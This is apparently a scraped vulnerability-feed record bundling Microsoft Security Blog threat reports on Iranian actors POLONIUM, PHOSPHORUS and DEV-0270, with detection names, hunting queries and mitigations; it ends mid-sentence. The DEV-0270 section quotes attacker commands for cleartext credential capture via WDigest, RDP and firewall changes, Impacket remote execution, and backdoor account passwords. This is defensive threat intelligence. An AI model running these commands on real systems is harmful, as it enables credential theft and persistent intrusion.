\nTrojan:PowerShell/CreepyDrive.B!dha| Tool| Custom implant signature \nTrojan:PowerShell/CreepyDrive.C!dha| Tool| Custom implant signature \nTrojan:PowerShell/CreepyDrive.D!dha| Tool| Custom implant signature \nTrojan:PowerShell/CreepyDrive.E!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyBox.A!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyBox.B!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyBox.C!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyRing.A!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyWink.B!dha| Tool| Custom implant signature \nBackdoor:PowerShell/CreepySnail.B!dha| Tool| Custom implant signature \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Detections\n\n### Microsoft 365 Defender\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malware tools and implants used by POLONIUM starting from signature build 1.365.40.0 as the following:\n\n * Trojan:PowerShell/CreepyDrive.A!dha\n * Trojan:PowerShell/CreepyDrive.B!dha\n * Trojan:PowerShell/CreepyDrive.C!dha\n * Trojan:PowerShell/CreepyDrive.D!dha\n * Trojan:PowerShell/CreepyDrive.E!dha\n * Trojan:MSIL/CreepyBox.A!dha\n * Trojan:MSIL/CreepyBox.B!dha\n * Trojan:MSIL/CreepyBox.C!dha\n * Trojan:MSIL/CreepyRing.A!dha\n * Trojan:MSIL/CreepyWink.B!dha\n * Backdoor:PowerShell/CreepySnail.B!dha\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint customers may see any or a combination of the following alerts as an indication of possible attack. These alerts are not necessarily an indication of POLONIUM compromise:\n\n * POLONIUM Actor Activity Detected\n * PowerShell made a suspicious network connection\n * Suspicious behavior by powershell.exe was observed\n * Hidden dual-use tool launch attempt\n * Outbound connection to non-standard port\n\n**Microsoft Defender for Cloud Apps**\n\nThe OAuth apps that were created in the victim tenants were created with only two specific scope of permissions: _offline_access_ and _Files.ReadWrite.All_. These applications were set to serve multi-tenant and performed only OneDrive operations. Applications accessed OneDrive workload via the Graph API, where most calls to the API from the application were made as search activities, with a few edit operations also observed.\n\nApp made numerous searches and edits in OneDrive\n\nApp governance, an add-on to Microsoft Defender for Cloud Apps, detects malicious OAuth applications that make numerous searches and edits in OneDrive. [Learn how to investigate anomaly detection alerts](<https://docs.microsoft.com/en-us/defender-cloud-apps/app-governance-anomaly-detection-alerts#app-made-numerous-searches-and-edits-in-onedrive>) in Microsoft Defender for Cloud Apps.\n\nMicrosoft Defender for Cloud Apps alert for malicious OAuth apps\n\n## Advanced hunting queries\n\n### Microsoft Sentinel\n\n#### Identify POLONIUM IOCs\n\nThis query identifies POLONIUM network IOCs within available Azure Sentinel network logging:\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/POLONIUMIPIoC.yaml>\n\n#### Detect CreepySnail static URI parameters\n\nThe CreepySnail tool utilizes static URI parameters that can be detected using the following query:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/CommonSecurityLog/CreepySnailURLParameters.yaml>\n\n#### Detect Base64-encoded/transmitted machine usernames or IP addresses \n\nCreepySnail also utilizes Base64-encoded parameters to transmit information from the victim to threat actor. The following queries detect machine usernames or IP addresses (based on Microsoft Defender for Endpoint logging) being transmitted under Base64 encoding in a web request:\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/B64UserInWebURIFromMDE.yaml>\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/B64IPInURLFromMDE.yaml>\n\n#### Detect POLONIUM requests to predictable OneDrive file paths\n\nThe OneDrive capability that POLONIUM utilizes makes requests to predictable OneDrive file paths to access various folders and files. The following queries detect these paths in use:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/CommonSecurityLog/CreepyDriveURLs.yaml>\n\n#### Detect sequence of request events related to unique CreepyDrive re-authentication attempts\n\nThe CreepyDrive implant makes a predictable sequence of requests to Microsoft authentication servers and OneDrive that can be detected using the following query:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/CommonSecurityLog/CreepyDriveRequestSequence.yaml>\n\n#### Hunt for other suspicious encoded request parameters\n\nThe following hunting queries can be used to hunt for further suspicious encoded request parameters:\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/CommonSecurityLog/B64IPInURL.yaml>\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/CommonSecurityLog/RiskyCommandB64EncodedInUrl.yaml>\n\nThe post [Exposing POLONIUM activity and infrastructure targeting Israeli organizations](<https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T16:00:00", "type": "mmpc", "title": "Exposing POLONIUM activity and infrastructure targeting Israeli organizations", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-06-02T16:00:00", "id": "MMPC:A2F131E46442125176E4853C860A816C", "href": "https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-19T19:23:28", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed the following playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mmpc", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-07T21:07:14", "description": "Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of [Iranian actor PHOSPHORUS](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>). Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran. However, judging from their geographic and sectoral targeting, which often lacked a strategic value for the regime, we assess with low confidence that some of DEV-0270\u2019s ransomware attacks are a form of moonlighting for personal or company-specific revenue generation. This blog profiles the tactics and techniques behind the DEV-0270/PHOSPHORUS ransomware campaigns. We hope this analysis, which Microsoft is using to protect customers from related attacks, further exposes and disrupts the expansion of DEV-0270\u2019s operations.\n\nDEV-0270 leverages exploits for high-severity vulnerabilities to gain access to devices and is known for the early adoption of newly disclosed vulnerabilities. DEV-0270 also extensively uses living-off-the-land binaries (LOLBINs) throughout the attack chain for discovery and credential access. This extends to its abuse of the built-in BitLocker tool to encrypt files on compromised devices.\n\nIn some instances where encryption was successful, the time to ransom (TTR) between initial access and the ransom note was around two days. The group has been observed demanding USD 8,000 for decryption keys. In addition, the actor has been observed pursuing other avenues to generate income through their operations. In one attack, a victim organization refused to pay the ransom, so the actor opted to post the stolen data from the organization for sale packaged in an SQL database dump.\n\nUsing these observations, this blog details the group\u2019s tactics and techniques across its end-to-end attack chain to help defenders identify, investigate, and mitigate attacks. We also provide extensive hunting queries designed to surface stealthy attacks. This blog also includes protection and hardening guidance to help organizations increase resilience against these and similar attacks.\n\nFigure 1. Typical DEV-0270 attack chain\n\n## Who is DEV-0270?\n\nMicrosoft assesses that DEV-0270 is operated by a company that functions under two public aliases: Secnerd (secnerd[.]ir) and Lifeweb (lifeweb[.]ir). We have observed numerous infrastructure overlaps between DEV-0270 and Secnerd/Lifeweb. These organizations are also linked to Najee Technology Hooshmand (\u0646\u0627\u062c\u06cc \u062a\u06a9\u0646\u0648\u0644\u0648\u0698\u06cc \u0647\u0648\u0634\u0645\u0646\u062f), located in Karaj, Iran.\n\nThe group is typically opportunistic in its targeting: the actor scans the internet to find vulnerable servers and devices, making organizations with vulnerable and discoverable servers and devices susceptible to these attacks.\n\nAs with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\n## Observed actor activity\n\n### Initial access\n\nIn many of the observed DEV-0270 instances, the actor gained access by exploiting known vulnerabilities in Exchange or Fortinet (CVE-2018-13379). For Exchange, the most prevalent exploit has been ProxyLogon\u2014this highlights the need to patch high-severity vulnerabilities in internet-facing devices, as the group has continued to successfully exploit these vulnerabilities even recently, well after updates supplied the fixes. While there have been indications that DEV-0270 attempted to exploit [Log4j 2 vulnerabilities](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>), Microsoft has not observed this activity used against customers to deploy ransomware.\n\n### Discovery\n\nUpon gaining access to an organization, DEV-0270 performs a series of discovery commands to learn more about the environment. The command [_wmic_](<https://docs.microsoft.com/windows/win32/wmisdk/wmic>)_ computersystem get domain _obtains the target\u2019s domain name. The _whoami_ command displays user information and _net user_ command is used to add or modify user accounts. For more information on the accounts created and common password phrases DEV-0270 used, refer to the Advanced Hunting section.\n\n * wmic computersystem get domain\n * whoami\n * net user\n\nOn the compromised Exchange server, the actor used the following command to understand the target environment.\n \n \n Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders\n\nFor discovery of domain controllers, the actor used the following PowerShell and WMI command.\n\n\n\n### Credential access\n\nDEV-0270 often opts for a particular method using a LOLBin to conduct their credential theft, as this removes the need to drop common credential theft tools more likely to be detected and blocked by antivirus and endpoint detection and response (EDR) solutions. This process starts by enabling WDigest in the registry, which results in passwords stored in cleartext on the device and saves the actor time by not having to crack a password hash.\n \n \n \"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\n\nThe actor then uses _rundll32.exe_ and _comsvcs.dll_ with its built-in MiniDump function to dump passwords from LSASS into a dump file. The command to accomplish this often specifies the output to save the passwords from LSASS. The file name is also reversed to evade detections (_ssasl.dmp)_:\n\n\n\n### Persistence\n\nTo maintain access in a compromised network, the DEV-0270 actor adds or creates a new user account, frequently named _DefaultAccount _with a password of _P@ssw0rd1234,_ to the device using the command _net user /add._ The _DefaultAccoun_t account is typically a pre-existing account set up but not enabled on most Windows systems.\n\nThe attacker then modifies the registry to allow remote desktop (RDP) connections for the device, adds a rule in the firewall using _netsh.exe_ to allow RDP connections, and adds the user to the remote desktop users group:\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v TSEnabled /t REG_DWORD /d 1 /f\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD\n \n \n \"netsh\" advfirewall firewall add rule name=\"Terminal Server\" dir=in action=allow protocol=TCP localport=3389\n\nScheduled tasks are one of the recurrent methods used by DEV-0270 in their attacks to maintain access to a device. Generally, the tasks load via an XML file and are configured to run on boot with the least privilege to launch a .bat via the command prompt. The batch file results in a download of a renamed _dllhost.exe_, a reverse proxy, for maintaining control of the device even if the organization removes the file from the device.\n\nFigure 2. Scheduled task used in DEV-0270 attacks\n\n### Privilege escalation\n\nDEV-0270 can usually obtain initial access with administrator or system-level privileges by injecting their web shell into a privileged process on a vulnerable web server. When the group uses Impacket\u2019s WMIExec to move to other systems on the network laterally, they are typically already using a privileged account to run remote commands. DEV-0270 also commonly dumps LSASS, as mentioned in the credential access section, to obtain local system credentials and masquerade as other local accounts which might have extended privileges.\n\nAnother form of privilege escalation used by DEV-0270 involves the creation or activation of a user account to provide it with administrator privileges. DEV-0270 uses _powershell.exe_ and _net.exe_ commands to create or enable this account and add it to the administrators\u2019 group for higher privileges.\n\n### Defense evasion\n\nDEV-0270 uses a handful of defensive evasion techniques to avoid detection. The threat actors typically turn off Microsoft Defender Antivirus real-time protection to prevent Microsoft Defender Antivirus from blocking the execution of their custom binaries. The threat group creates or activates the _DefaultAccount_ account to add it to the Administrators and Remote Desktop Users groups. The modification of the _DefaultAccount_ provides the threat actor group with a legitimate pre-existing account with nonstandard, higher privileges. DEV-0270 also uses _powershell.exe_ to load their custom root certificate to the local certificate database. This custom certificate is spoofed to appear as a legitimate Microsoft-signed certificate. However, Windows flags the spoofed certificate as invalid due to the unverified certificate signing chain. This certificate allows the group to encrypt their malicious communications to blend in with other legitimate traffic on the network.\n\nAdditionally, DEV-0270 heavily uses native LOLBins to effectively avoid detection. The threat group commonly uses native WMI, net, CMD, and PowerShell commands and registry configurations to maintain stealth and operational security. They also install and masquerade their custom binaries as legitimate processes to hide their presence. Some of the legitimate processes they masquerade their tools as include: _dllhost.exe_, _task_update.exe_, _user.exe_, and _CacheTask_. Using .bat files and _powershell.exe_, DEV-0270 might terminate existing legitimate processes, run their binary with the same process name, and then configure scheduled tasks to ensure the persistence of their custom binaries.\n\n### Lateral movement\n\nDEV-0270 has been seen creating _defaultaccount_ and adding that account to the Remote Desktop Users group. The group uses the RDP connection to move laterally, copy tools to the target device, and perform encryption.\n\nAlong with RDP, [Impacket](<https://github.com/SecureAuthCorp/impacket/>)\u2019s WMIExec is a known toolkit used by the group for lateral movement. In multiple compromises, this was the main method observed for them to pivot to additional devices in the organization, execute commands to find additional high-value targets, and dump credentials for escalating privileges.\n\nAn example of a command using Impacket\u2019s WMIExec from a remote device:\n \n \n cmd.exe /Q /c quser 1> \\\\127.0.0.1\\ADMIN$\\__1657130354.2207212 2>&1\n\n### Impact\n\nDEV-0270 has been seen using _setup.bat_ commands to enable BitLocker encryption, which leads to the hosts becoming inoperable. For workstations, the group uses _DiskCryptor_, an open-source full disk encryption system for Windows that allows for the encryption of a device&#x27;s entire hard drive. The group drops _DiskCryptor_ from an RDP session and when it is launched, begins the encryption. This method does require a reboot to install and another reboot to lock out access to the workstation.\n\nThe following are DEV-0270\u2019s PowerShell commands using BitLocker:\n\n\n\nMicrosoft will continue to monitor DEV-0270 and PHOSPHORUS activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Recommended mitigation steps\n\nThe techniques used by DEV-0270 can be mitigated through the following actions:\n\n * Apply the [corresponding security updates for Exchange Server](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>), including applicable fixes for [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>). While it is important to prioritize patching of internet-facing Exchange servers to mitigate risk in an ordered manner, unpatched internal Exchange Server instances should also be addressed as soon as possible.\n * For Exchange Server instances in Mainstream Support, critical product updates are released for the most recently released Cumulative Updates (CU) and for the previous CU. For Exchange Server instances in Extended Support, critical product updates are released for the most recently released CU only.\n * If you don&#x27;t have a supported CU, Microsoft is producing an additional series of security updates (SUs) that can be applied to some older and unsupported CUs to help customers more quickly protect their environment. For information on these updates, see March 2021 Exchange Server Security Updates for older Cumulative Updates of Exchange Server.\n * Installing the updates is the only complete mitigation for these vulnerabilities and has no impact on functionality. If the threat actor has exploited these vulnerabilities to install malware, installing the updates _does not_ remove implanted malware or evict the actor.\n * Use [Microsoft Defender Firewall](<https://support.microsoft.com/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f>), intrusion prevention devices, and your network firewall to prevent RPC and SMB communication among devices whenever possible. This limits lateral movement and other attack activities.\n * Check your perimeter firewall and proxy to restrict or prevent network appliances like Fortinet SSL VPN devices from making arbitrary connections to the internet to browse or download files.\n * Enforce strong local administrator passwords. Use tools like [LAPS](<https://docs.microsoft.com/previous-versions/mt227395\\(v=msdn.10\\)?redirectedfrom=MSDN>).\n * Ensure that [Microsoft Defender Antivirus](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows?view=o365-worldwide>) is up to date and that real-time behavior monitoring is enabled.\n * Keep backups so you can recover data affected by destructive attacks. Use controlled folder access to prevent unauthorized applications from modifying protected files.\n * Turn on the following [attack surface reduction rules](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) to block or audit activity associated with this threat:\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n * Block process creations originating from PsExec and WMI commands\n * Block persistence through WMI event subscription. Ensure that Microsoft Defender for Endpoint is up to date and that real-time behavior monitoring is enabled\n\n## Detection details\n\n### Microsoft Defender for Endpoint\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Malware associated with DEV-0270 activity group detected\n\nThe following additional alerts may also indicate activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\nA script with suspicious content was observed| Suspicious file dropped by Exchange Server process \n---|--- \nA suspicious file was observed| Suspicious Modify Registry \nAnomalous behavior by a common executable| Suspicious Permission Groups Discovery \nLazagne post-exploitation tool| Suspicious PowerShell command line \nLocal Emails Collected| Suspicious PowerShell download or encoded command execution \nMimikatz credential theft tool| Suspicious Process Discovery \n&#x27;Mimilove&#x27; high-severity malware was prevented| Suspicious process executed PowerShell command \nNew group added suspiciously| Suspicious process launched using dllhost.exe \nOngoing hands-on-keyboard attack via Impacket toolkit| Suspicious &#x27;PShellCobStager&#x27; behavior was blocked \nPossible Antimalware Scan Interface (AMSI) tampering| Suspicious Scheduled Task Process Launched \nPossible attempt to discover groups and permissions| Suspicious sequence of exploration activities \nPossible exploitation of Exchange Server vulnerabilities| Suspicious &#x27;SuspExchgSession&#x27; behavior was blocked \nPossible exploitation of ProxyShell vulnerabilities| Suspicious System Network Configuration Discovery \nPossible web shell installation| Suspicious System Owner/User Discovery \nProcess memory dump| Suspicious Task Scheduler activity \nSuspicious Account Discovery: Email Account| Suspicious User Account Discovery \nSuspicious behavior by cmd.exe was observed| Suspicious user password change \nSuspicious behavior by svchost.exe was observed| Suspicious w3wp.exe activity in Exchange \nSystem file masquerade \nSuspicious behavior by Web server process| Tampering with the Microsoft Defender for Endpoint sensor \nSuspicious Create Account| Unusual sequence of failed logons \nSuspicious file dropped| WDigest configuration change \n \n## Hunting queries\n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for the related malicious activity in their environments.\n\n**DEV-0270 registry IOC**\n\nThis query identifies modification of registry by DEV-0270 actor to disable security feature as well as to add ransom notes:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270RegistryIOCSep2022.yaml>\n\n**DEV-0270 malicious PowerShell usage**\n\nDEV-0270 heavily uses PowerShell to achieve their objective at 